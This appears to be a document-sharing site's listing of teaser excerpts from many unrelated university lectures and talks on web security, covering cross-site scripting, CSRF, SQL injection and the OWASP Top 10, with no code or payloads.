Web Security IV: Cross-Site Attacks 1 Web Security IV: Cross-Site Attacks Chengyu Song Slides modified from Dawn Song 2 Administrivia Lab3 New terminator: http://www.cs.ucr.edu/~csong/sec/17/l/new_terminator Bonus for solving the old one

More information

Robust Defenses for Cross-Site Request Forgery

Robust Defenses for Cross-Site Request Forgery University of Cyprus Department of Computer Science Advanced Security Topics Robust Defenses for Cross-Site Request Forgery Name: Elena Prodromou Instructor: Dr. Elias Athanasopoulos Authors: Adam Barth,

More information

CSC 482/582: Computer Security. Cross-Site Security

CSC 482/582: Computer Security. Cross-Site Security Cross-Site Security 8chan xss via html 5 storage ex http://arstechnica.com/security/2015/09/serious- imgur-bug-exploited-to-execute-worm-like-attack-on- 8chan-users/ Topics 1. Same Origin Policy 2. Credential

More information

2/16/18. Secure Coding. CYSE 411/AIT 681 Secure Software Engineering. Web Security Outline. The Web. The Web, Basically.

2/16/18. Secure Coding. CYSE 411/AIT 681 Secure Software Engineering. Web Security Outline. The Web. The Web, Basically. Secure Coding CYSE 411/AIT 681 Secure Software Engineering Topic #11. Web Security Instructor: Dr. Kun Sun String management Pointer Subterfuge Dynamic memory management Integer security Formatted output

More information

Attacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14

Attacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14 Attacks Against Websites 3 The OWASP Top 10 Tom Chothia Computer Security, Lecture 14 OWASP top 10. The Open Web Application Security Project Open public effort to improve web security: Many useful documents.

More information

Common Websites Security Issues. Ziv Perry

Common Websites Security Issues. Ziv Perry Common Websites Security Issues Ziv Perry About me Mitnick attack TCP splicing Sql injection Transitive trust XSS Denial of Service DNS Spoofing CSRF Source routing SYN flooding ICMP

More information

Computer Security 3e. Dieter Gollmann. Chapter 18: 1

Computer Security 3e. Dieter Gollmann.  Chapter 18: 1 Computer Security 3e Dieter Gollmann www.wiley.com/college/gollmann Chapter 18: 1 Chapter 18: Web Security Chapter 18: 2 Web 1.0 browser HTTP request HTML + CSS data web server backend systems Chapter

More information

Application vulnerabilities and defences

Application vulnerabilities and defences Application vulnerabilities and defences In this lecture We examine the following : SQL injection XSS CSRF SQL injection SQL injection is a basic attack used to either gain unauthorized access to a database

More information

Is Browsing Safe? Web Browser Security. Subverting the Browser. Browser Security Model. XSS / Script Injection. 1. XSS / Script Injection

Is Browsing Safe? Web Browser Security. Subverting the Browser. Browser Security Model. XSS / Script Injection. 1. XSS / Script Injection Is Browsing Safe? Web Browser Security Charlie Reis Guest Lecture - CSE 490K - 5/24/2007 Send Spam Search Results Change Address? Install Malware Web Mail Movie Rentals 2 Browser Security Model Pages are

More information

Content Security Policy

Content Security Policy About Tim Content Security Policy New Tools for Fighting XSS Pentester > 10 years Web Applications Network Security Products Exploit Research Founded Blindspot Security in 2014 Pentesting Developer Training

More information

Web 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007

Web 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007 Web 2.0 and AJAX Security OWASP Montgomery August 21 st, 2007 Overview Introduction Definition of Web 2.0 Basics of AJAX Attack Vectors for AJAX Applications AJAX and Application Security Conclusions 1

More information

CSCE 813 Internet Security Case Study II: XSS

CSCE 813 Internet Security Case Study II: XSS CSCE 813 Internet Security Case Study II: XSS Professor Lisa Luo Fall 2017 Outline Cross-site Scripting (XSS) Attacks Prevention 2 What is XSS? Cross-site scripting (XSS) is a code injection attack that

More information

INF3700 Informasjonsteknologi og samfunn. Application Security. Audun Jøsang University of Oslo Spring 2015

INF3700 Informasjonsteknologi og samfunn. Application Security. Audun Jøsang University of Oslo Spring 2015 INF3700 Informasjonsteknologi og samfunn Application Security Audun Jøsang University of Oslo Spring 2015 Outline Application Security Malicious Software Attacks on applications 2 Malicious Software 3

More information

C1: Define Security Requirements

C1: Define Security Requirements OWASP Top 10 Proactive Controls IEEE Top 10 Software Security Design Flaws OWASP Top 10 Vulnerabilities Mitigated OWASP Mobile Top 10 Vulnerabilities Mitigated C1: Define Security Requirements A security

More information

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis CSE361 Web Security Attacks against the client-side of web applications Nick Nikiforakis nick@cs.stonybrook.edu Despite the same origin policy Many things can go wrong at the client-side of a web application

More information

Web Security 2 https://www.xkcd.com/177/ http://xkcd.com/1323/ Encryption basics Plaintext message key secret Encryp)on Func)on Ciphertext Insecure network Decryp)on Func)on Curses! Foiled again! key Plaintext

More information

Top 10 Web Application Vulnerabilities

Top 10 Web Application Vulnerabilities Top 10 Web Application Vulnerabilities Why you should care about them plus a live hacking demo!! Why should you care?! Insecure so*ware is undermining our financial, healthcare, defense, energy, and other

More information

Andrew Muller, Canberra Managing Director, Ionize, Canberra The challenges of Security Testing. Security Testing. Taming the Wild West

Andrew Muller, Canberra Managing Director, Ionize, Canberra The challenges of Security Testing. Security Testing. Taming the Wild West Andrew Muller, Canberra Managing Director, Ionize, Canberra The challenges of Security Testing Advancing Expertise in Security Testing Taming the Wild West Canberra, Australia 1 Who is this guy? Andrew

More information

Application Security through a Hacker s Eyes James Walden Northern Kentucky University

Application Security through a Hacker s Eyes James Walden Northern Kentucky University Application Security through a Hacker s Eyes James Walden Northern Kentucky University waldenj@nku.edu Why Do Hackers Target Web Apps? Attack Surface A system s attack surface consists of all of the ways

More information

Application Layer Security

Application Layer Security Application Layer Security General overview Ma. Angel Marquez Andrade Benefits of web Applications: No need to distribute separate client software Changes to the interface take effect immediately Client-side

More information

Application Security Introduction. Tara Gu IBM Product Security Incident Response Team

Application Security Introduction. Tara Gu IBM Product Security Incident Response Team Application Security Introduction Tara Gu IBM Product Security Incident Response Team About Me - Tara Gu - tara.weiqing@gmail.com - Duke B.S.E Biomedical Engineering - Duke M.Eng Computer Engineering -

More information

THREAT MODELING IN SOCIAL NETWORKS. Molulaqhooa Maoyi Rotondwa Ratshidaho Sanele Macanda

THREAT MODELING IN SOCIAL NETWORKS. Molulaqhooa Maoyi Rotondwa Ratshidaho Sanele Macanda THREAT MODELING IN SOCIAL NETWORKS Molulaqhooa Maoyi Rotondwa Ratshidaho Sanele Macanda INTRODUCTION Social Networks popular web service. 62% adults worldwide use social media 65% of world top companies

More information

Exploiting and Defending: Common Web Application Vulnerabilities

Exploiting and Defending: Common Web Application Vulnerabilities Exploiting and Defending: Common Web Application Vulnerabilities Introduction: Steve Kosten Principal Security Consultant SANS Instructor Denver OWASP Chapter Lead Certifications CISSP, GWAPT, GSSP-Java,

More information

GOING WHERE NO WAFS HAVE GONE BEFORE

GOING WHERE NO WAFS HAVE GONE BEFORE GOING WHERE NO WAFS HAVE GONE BEFORE Andy Prow Aura Information Security Sam Pickles Senior Systems Engineer, F5 Networks NZ Agenda: WTF is a WAF? View from the Trenches Example Attacks and Mitigation

More information

last time: command injection

last time: command injection Web Security 1 last time: command injection 2 placing user input in more complicated language SQL shell commands input accidentally treated as commands in language instead of single value (e.g. argument/string

More information

Sichere Webanwendungen mit Java

Sichere Webanwendungen mit Java Sichere Webanwendungen mit Java Karlsruher IT- Sicherheitsinitiative 16.07.2015 Dominik Schadow bridgingit Patch fast Unsafe platform unsafe web application Now lets have a look at the developers OWASP

More information

EasyCrypt passes an independent security audit

EasyCrypt passes an independent security audit July 24, 2017 EasyCrypt passes an independent security audit EasyCrypt, a Swiss-based email encryption and privacy service, announced that it has passed an independent security audit. The audit was sponsored

More information

Security for the Web. Thanks to Dave Levin for some slides

Security for the Web. Thanks to Dave Levin for some slides Security for the Web Thanks to Dave Levin for some slides The Web Security for the World-Wide Web (WWW) presents new vulnerabilities to consider: SQL injection, Cross-site Scripting (XSS), These share

More information

CS 161 Computer Security

CS 161 Computer Security Paxson Spring 2011 CS 161 Computer Security Discussion 6 March 2, 2011 Question 1 Cross-Site Scripting (XSS) (10 min) As part of your daily routine, you are browsing through the news and status updates

More information

Copyright

Copyright 1 Security Test EXTRA Workshop : ANSWER THESE QUESTIONS 1. What do you consider to be the biggest security issues with mobile phones? 2. How seriously are consumers and companies taking these threats?

More information

Application Layer Attacks. Application Layer Attacks. Application Layer. Application Layer. Internet Protocols. Application Layer.

Application Layer Attacks. Application Layer Attacks. Application Layer. Application Layer. Internet Protocols. Application Layer. Application Layer Attacks Application Layer Attacks Week 2 Part 2 Attacks Against Programs Application Layer Application Layer Attacks come in many forms and can target each of the 5 network protocol layers

More information

OWASP Top 10 The Ten Most Critical Web Application Security Risks

OWASP Top 10 The Ten Most Critical Web Application Security Risks OWASP Top 10 The Ten Most Critical Web Application Security Risks The Open Web Application Security Project (OWASP) is an open community dedicated to enabling organizations to develop, purchase, and maintain

More information

DEFENSIVE PROGRAMMING. Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology

DEFENSIVE PROGRAMMING. Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology DEFENSIVE PROGRAMMING Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology Traditional Programming When writing a program, programmers typically

More information

CSE 484 / CSE M 584: Computer Security and Privacy. Web Security. Autumn Tadayoshi (Yoshi) Kohno

CSE 484 / CSE M 584: Computer Security and Privacy. Web Security. Autumn Tadayoshi (Yoshi) Kohno CSE 484 / CSE M 584: Computer Security and Privacy Web Security Autumn 2018 Tadayoshi (Yoshi) Kohno yoshi@cs.washington.edu Thanks to Dan Boneh, Dieter Gollmann, Dan Halperin, Ada Lerner, John Manferdelli,

More information

Welcome to the OWASP TOP 10

Welcome to the OWASP TOP 10 Welcome to the OWASP TOP 10 Secure Development for Java Developers Dominik Schadow 03/20/2012 BASEL BERN LAUSANNE ZÜRICH DÜSSELDORF FRANKFURT A.M. FREIBURG I.BR. HAMBURG MÜNCHEN STUTTGART WIEN 1 AGENDA

More information

Security for the Web. Thanks to Dave Levin for some slides

Security for the Web. Thanks to Dave Levin for some slides Security for the Web Thanks to Dave Levin for some slides The Web Security for the World-Wide Web (WWW) presents new vulnerabilities to consider: SQL injection, Cross-site Scripting (XSS), These share

More information

Web Application Security

Web Application Security Web Application Security Rajendra Kachhwaha rajendra1983@gmail.com October 16, 2015 Lecture 16: 1/ 14 Outline Browser Security Principles: 1 Cross Site Scripting (XSS) 2 Types of XSS 3 Lecture 16: 2/ 14

More information

More attacks on clients: Click-jacking/UI redressing, CSRF

More attacks on clients: Click-jacking/UI redressing, CSRF Web Security More attacks on clients: Click-jacking/UI redressing, CSRF (Section 7.2.3 on Click-jacking; Section 7.2.7 on CSRF; Section 7.2.8 on Defenses against client-side attacks) 1 Recall from last

More information

Web Application Security. * Original slides were prepared by John Mitchell

Web Application Security. * Original slides were prepared by John Mitchell Web Application Security * Original slides were prepared by John Mitchell OWASP Top Ten (2013) A-1 Injection Untrusted data is sent to an interpreter as part of a command or query. A-2 Authentication and

More information

Reflected XSS Cross-Site Request Forgery Other Attacks

Reflected XSS Cross-Site Request Forgery Other Attacks Reflected XSS Cross-Site Request Forgery Other Attacks CS 166: Introduction to Computer Systems Security 2/21/18 XSS, CSRF, Other Attacks 1 Reflected XSS 2/21/18 XSS, CSRF, Other Attacks 2 Recap of Persistent

More information

1 About Web Security. What is application security? So what can happen? see [?]

1 About Web Security. What is application security? So what can happen? see [?] 1 About Web Security What is application security? see [?] So what can happen? 1 taken from [?] first half of 2013 Let s focus on application security risks Risk = vulnerability + impact New App: http://www-03.ibm.com/security/xforce/xfisi

More information

W e b A p p l i c a t i o n S e c u r i t y : T h e D e v i l i s i n t h e D e t a i l s

W e b A p p l i c a t i o n S e c u r i t y : T h e D e v i l i s i n t h e D e t a i l s W e b A p p l i c a t i o n S e c u r i t y : T h e D e v i l i s i n t h e D e t a i l s Session I of III JD Nir, Security Analyst Why is this important? ISE Proprietary Agenda About ISE Web Applications

More information

Web Security: Vulnerabilities & Attacks

Web Security: Vulnerabilities & Attacks Computer Security Course. Web Security: Vulnerabilities & Attacks Type 2 Type 1 Type 0 Three Types of XSS Type 2: Persistent or Stored The attack vector is stored at the server Type 1: Reflected The attack

More information

Web Attacks, con t. CS 161: Computer Security. Prof. Vern Paxson. TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin

Web Attacks, con t. CS 161: Computer Security. Prof. Vern Paxson. TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin Web Attacks, con t CS 161: Computer Security Prof. Vern Paxson TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin http://inst.eecs.berkeley.edu/~cs161/ February 22, 2011 Announcements See Still confused

More information

Your Turn to Hack the OWASP Top 10!

Your Turn to Hack the OWASP Top 10! OWASP Top 10 Web Application Security Risks Your Turn to Hack OWASP Top 10 using Mutillidae Born to Be Hacked Metasploit in VMWare Page 1 https://www.owasp.org/index.php/main_page The Open Web Application

More information

RKN 2015 Application Layer Short Summary

RKN 2015 Application Layer Short Summary RKN 2015 Application Layer Short Summary HTTP standard version now: 1.1 (former 1.0 HTTP /2.0 in draft form, already used HTTP Requests Headers and body counterpart: answer Safe methods (requests): GET,

More information

Sichere Software vom Java-Entwickler

Sichere Software vom Java-Entwickler Sichere Software vom Java-Entwickler Dominik Schadow Java Forum Stuttgart 05.07.2012 BASEL BERN LAUSANNE ZÜRICH DÜSSELDORF FRANKFURT A.M. FREIBURG I.BR. HAMBURG MÜNCHEN STUTTGART WIEN We can no longer

More information

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang WEB SECURITY WORKSHOP TEXSAW 2014 Presented by Solomon Boyd and Jiayang Wang Introduction and Background Targets Web Applications Web Pages Databases Goals Steal data Gain access to system Bypass authentication

More information

Lecture Overview. IN5290 Ethical Hacking

Lecture Overview. IN5290 Ethical Hacking Lecture Overview IN5290 Ethical Hacking Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks Universitetet i Oslo Laszlo Erdödi How to use Burp

More information

Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks

Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks IN5290 Ethical Hacking Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks Universitetet i Oslo Laszlo Erdödi Lecture Overview How to use Burp

More information

Aguascalientes Local Chapter. Kickoff

Aguascalientes Local Chapter. Kickoff Aguascalientes Local Chapter Kickoff juan.gama@owasp.org About Us Chapter Leader Juan Gama Application Security Engineer @ Aspect Security 9+ years in Appsec, Testing, Development Maintainer of OWASP Benchmark

More information

Information Security. Gabriel Lawrence Director, IT Security UCSD

Information Security. Gabriel Lawrence Director, IT Security UCSD Information Security Gabriel Lawrence Director, IT Security UCSD Director of IT Security, UCSD Three Startups (2 still around!) Sun Microsystems (Consulting and JavaSoftware) Secure Internet Applications

More information

CS 161 Computer Security

CS 161 Computer Security Nick Weaver Fall 2018 CS 161 Computer Security Homework 3 Due: Friday, 19 October 2018, at 11:59pm Instructions. This homework is due Friday, 19 October 2018, at 11:59pm. No late homeworks will be accepted

More information

Advanced Web Technology 10) XSS, CSRF and SQL Injection

Advanced Web Technology 10) XSS, CSRF and SQL Injection Berner Fachhochschule, Technik und Informatik Advanced Web Technology 10) XSS, CSRF and SQL Injection Dr. E. Benoist Fall Semester 2010/2011 1 Table of Contents Cross Site Request Forgery - CSRF Presentation

More information

Evaluating the Security Risks of Static vs. Dynamic Websites

Evaluating the Security Risks of Static vs. Dynamic Websites Evaluating the Security Risks of Static vs. Dynamic Websites Ballard Blair Comp 116: Introduction to Computer Security Professor Ming Chow December 13, 2017 Abstract This research paper aims to outline

More information

Solutions Business Manager Web Application Security Assessment

Solutions Business Manager Web Application Security Assessment White Paper Solutions Business Manager Solutions Business Manager 11.3.1 Web Application Security Assessment Table of Contents Micro Focus Takes Security Seriously... 1 Solutions Business Manager Security

More information

Excerpts of Web Application Security focusing on Data Validation. adapted for F.I.S.T. 2004, Frankfurt

Excerpts of Web Application Security focusing on Data Validation. adapted for F.I.S.T. 2004, Frankfurt Excerpts of Web Application Security focusing on Data Validation adapted for F.I.S.T. 2004, Frankfurt by fs Purpose of this course: 1. Relate to WA s and get a basic understanding of them 2. Understand

More information

COMP9321 Web Application Engineering

COMP9321 Web Application Engineering COMP9321 Web Application Engineering Web Application Security Dr. Basem Suleiman Service Oriented Computing Group, CSE, UNSW Australia Semester 1, 2016, Week 8 http://webapps.cse.unsw.edu.au/webcms2/course/index.php?cid=2442

More information

OWASP TOP 10. By: Ilia

OWASP TOP 10. By: Ilia OWASP TOP 10 By: Ilia Alshanetsky @iliaa ME, MYSELF & I PHP Core Developer Author of Guide to PHP Security Security Aficionado WEB SECURITY THE CONUNDRUM USABILITY SECURITY YOU CAN HAVE ONE ;-) OPEN WEB

More information

Web Security: Vulnerabilities & Attacks

Web Security: Vulnerabilities & Attacks Computer Security Course. Song Dawn Web Security: Vulnerabilities & Attacks Cross-site Scripting What is Cross-site Scripting (XSS)? Vulnerability in web application that enables attackers to inject client-side

More information

W3Conf, November 15 & 16, Brad Scott

W3Conf, November 15 & 16, Brad Scott The Future of Web Application Security W3Conf, November 15 & 16, 2011 Brad Hill @hillbrad bhill@paypal-inc.com Scott Stender @scottstender scott@isecpartners.com The History of Web App Security Attacker

More information

Security and Privacy. SWE 432, Fall 2016 Design and Implementation of Software for the Web

Security and Privacy. SWE 432, Fall 2016 Design and Implementation of Software for the Web Security and Privacy SWE 432, Fall 2016 Design and Implementation of Software for the Web Today Security What is it? Most important types of attacks Privacy For further reading: https://www.owasp.org/index.php/

More information

Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any

Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any OWASP Top 10 Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any tester can (and should) do security testing

More information

OWASP Top David Caissy OWASP Los Angeles Chapter July 2017

OWASP Top David Caissy OWASP Los Angeles Chapter July 2017 OWASP Top 10-2017 David Caissy OWASP Los Angeles Chapter July 2017 About Me David Caissy Web App Penetration Tester Former Java Application Architect IT Security Trainer: Developers Penetration Testers

More information